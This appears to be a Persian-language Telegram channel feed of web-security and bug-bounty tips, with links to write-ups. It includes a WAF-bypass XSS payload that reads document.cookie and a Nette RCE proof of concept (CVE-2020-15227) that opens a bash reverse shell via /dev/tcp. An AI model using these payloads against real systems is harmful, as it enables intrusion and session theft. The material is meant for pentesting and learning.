Web_Priv8
765 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
در mysql نسخه های بالاتر از 5.7.22 میتوان بجای Group_concat از json_arrayagg استفاده کرد


#sqli
#pentest
#waf


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
چطور روی شرکت بزرگی مثل Airbnb باگ XSS کشف می‌شه (روی APIای که خروجی JSON می‌ده!) و چطور فیلترها و مکانیزم‌های امنیتی روی این پلتفرم دور زده می‌شه و نهایتا ۱۵ هزار دلار جایزه می‌بره. توی این ویدئو ببینید.
@offsecmag
کشف باگ RCE در اپلیکیشن اندرویدی فیسبوک به واسطه دانلود فایل

https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f


#facebook
#rce
#bugbounty
#android


@sec_nerd
راهکارهای دور زدن WAF در حملات XSS

#waf
#xss
#pentest
#bugbounty

@sec_nerd
دور زدن WAF و بلک لیست با پیلود جدید XSS

Payload: alert?.(document?.cookie)


#xss
#bugbounty


@sec_nerd
شرق آسیایی ها بعد از اپلیکیشن های مبتنی بر جاوا حالا سراغ فریمورک های php رفتن و اینبار از فریمورک nette آسیب پذیری RCE کشف کردن

CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1


#php
#nette
#rce


@sec_nerd
راهکارهایی برای دور زدن پیامهای 403 و 401

#bugbounty
#pentest


@sec_nerd
Forwarded from digMeMore (r00t98)
مقاله ای در خصوص باگ بانتی برای دوستانی که تازه وارد این حوزه شدن و نیاز به درک مفاهیم دارن, پیشنهاد میکنم بخونید نکات خوبی داره.

https://medium.com/bountynuggets/understanding-the-bug-bounty-game-bug-bounty-nuggets-65f565273013

#BugBounty

@digmemore